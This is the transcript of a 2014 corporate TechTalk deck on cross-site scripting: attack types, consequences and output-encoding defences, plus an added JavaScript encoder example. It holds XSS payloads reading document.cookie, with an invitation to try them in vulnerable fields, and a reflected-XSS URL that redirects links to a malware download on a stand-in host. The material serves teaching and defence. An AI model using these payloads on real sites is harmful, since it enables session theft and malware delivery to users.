TechTalk - Cross Site Scripting XSS

TechTalk, FEBRUARY 2014: Cross Site Scripting XSS. DEPARTMENT: ARCHITECTURE AND DEVELOPMENT

Description

Jürgen Kranz and Justice Nanhou (Architecture and Development Department at axxessio) focused on Cross Site Scripting XSS during this TechTalk.

Transcript of TechTalk - Cross Site Scripting XSS

Page 1: TechTalk - Cross Site Scripting XSS

TechTalk

FEBRUARY 2014

Cross Site Scripting XSS

DEPARTMENT: ARCHITECTURE AND DEVELOPMENT

Page 2: TechTalk - Cross Site Scripting XSS

Table of Contents

» Introduction
» Stored XSS
» Reflected XSS
» DOM Based XSS
» XSS Attack Consequences
» How to Protect Yourself

Page 3: TechTalk - Cross Site Scripting XSS

Introduction

https://www.owasp.org/index.php/Top_10_2013-Release_Notes

Page 4: TechTalk - Cross Site Scripting XSS

Introduction

» XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping.
» It allows attackers to execute scripts in the victim's browser, which can:
  » hijack user sessions,
  » deface web sites, or
  » redirect the user to malicious sites.

Page 5: TechTalk - Cross Site Scripting XSS

Introduction

https://www.youtube.com/watch?v=_Z9RQSnf8-g

Page 6: TechTalk - Cross Site Scripting XSS

Stored XSS Attacks

» The injected code is permanently stored on the target servers:
  » Database
  » Message forum
  » Visitor log
  » Comment field
  » …
» The victim then retrieves the malicious script from the server when it requests the stored information.

Page 7: TechTalk - Cross Site Scripting XSS

Stored XSS Attacks

Test XSS, <script>alert(document.cookie)</script>

Page 8: TechTalk - Cross Site Scripting XSS

Stored XSS Attacks

Test XSS, <script>alert(document.cookie)</script>

Page 9: TechTalk - Cross Site Scripting XSS

Reflected XSS Attacks

» The injected code is reflected off the web server, such as in:
  » An error message
  » A search result
  » An e-mail message
  » Or any other response that includes some or all of the input sent to the server as part of the request

Page 10: TechTalk - Cross Site Scripting XSS

Reflected XSS Attacks

http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>

Page 11: TechTalk - Cross Site Scripting XSS

Reflected XSS Attacks

Different syntax or encoding

Try to write these scripts into vulnerable input fields:

" onfocus="alert(document.cookie)

"><script >alert(document.cookie)</script >

"%3cscript%3ealert(document.cookie)%3c/script%3e

"><ScRiPt>alert(document.cookie)</ScRiPt>

Page 12: TechTalk - Cross Site Scripting XSS

DOM Based XSS

» The DOM, or Document Object Model, is the structural format used to represent documents in a browser.
» DOM Based XSS is the de facto name for XSS bugs where the page's own client-side script writes untrusted data into the DOM, as in the example below.

<script>document.write("Site is at: " + document.location.href + ".");</script>

Page 13: TechTalk - Cross Site Scripting XSS

XSS Attack Consequences

» The consequence is the same regardless of whether it is stored, reflected or DOM based.
» The most severe XSS attacks involve disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account.
» It can also include:
  » disclosure of end user files
  » installation of Trojan horse programs
  » redirecting the user to some other page or site
  » modifying the presentation of content

Page 14: TechTalk - Cross Site Scripting XSS

How to Protect Yourself

» Escape output provided by users: HTML encode any <, >, &, ', " or don't allow it.
» Validate user data to make sure it meets your expectations: use an HTML policy engine to validate or clean user-driven HTML on the way out.

Attribute escape before inserting untrusted data into HTML common attributes:

String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );

JavaScript escape before inserting untrusted data into JavaScript data values:

String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
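As an added example that is not from the slides, from axxessio or from the ESAPI library, the three context-specific encoders named above are re-implemented in plain JavaScript and run over the payloads from the "Different syntax or encoding" slide; encodeForHtml, encodeForHtmlAttribute, encodeForJavaScript, renderUserFragments and isNeutralised are names chosen here, and the escaping rules follow ESAPI only in spirit.

```javascript
// Added example, not from the TechTalk slides or from ESAPI: small context-aware
// output encoders in the spirit of encodeForHTML/HTMLAttribute/JavaScript.
// HTML body context: encode the five characters the slide lists (<, >, &, ', ").
function encodeForHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(untrusted).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context: every non-alphanumeric becomes &#xHH; so a quote or a
// space in the input can never close the attribute it sits in.
function encodeForHtmlAttribute(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, (c) =>
    '&#x' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0') + ';');
}

// JavaScript data value context: \xHH (or \uHHHH above 0xFF) so the input can
// neither terminate the string literal nor the enclosing <script> block.
function encodeForJavaScript(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).toUpperCase().padStart(2, '0')
      : '\\u' + code.toString(16).toUpperCase().padStart(4, '0');
  });
}

// The three places a page might render one untrusted "user" parameter, each
// using the encoder that matches its context.
function renderUserFragments(user) {
  return {
    body: '<p>Hello ' + encodeForHtml(user) + '</p>',
    attribute: '<input value="' + encodeForHtmlAttribute(user) + '">',
    script: '<script>var user = "' + encodeForJavaScript(user) + '";</script>',
  };
}

// True when the encoded value can no longer break out of any context: no raw
// <, >, quotes in the body; only alphanumerics or escapes in attribute and script.
function isNeutralised(user) {
  const bodyOk = !/[<>"']/.test(encodeForHtml(user));
  const attrOk = /^(?:[A-Za-z0-9]|&#x[0-9A-F]+;)*$/.test(encodeForHtmlAttribute(user));
  const jsOk = /^(?:[A-Za-z0-9]|\\x[0-9A-F]{2}|\\u[0-9A-F]{4})*$/.test(encodeForJavaScript(user));
  return bodyOk && attrOk && jsOk;
}
// Constructed sample: the payloads from the "Different syntax or encoding" slide.
const SAMPLE_PAYLOADS = [
  '" onfocus="alert(document.cookie)',
  '"><script >alert(document.cookie)</script >',
  '"><ScRiPt>alert(document.cookie)</ScRiPt>',
];
```

Every payload is neutralised only because each fragment uses the encoder for its own context; applying encodeForHtml inside the attribute or script would still leave the space and the backslash-free quote handling to the browser.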

Page 15: TechTalk - Cross Site Scripting XSS

Thank you for your attention!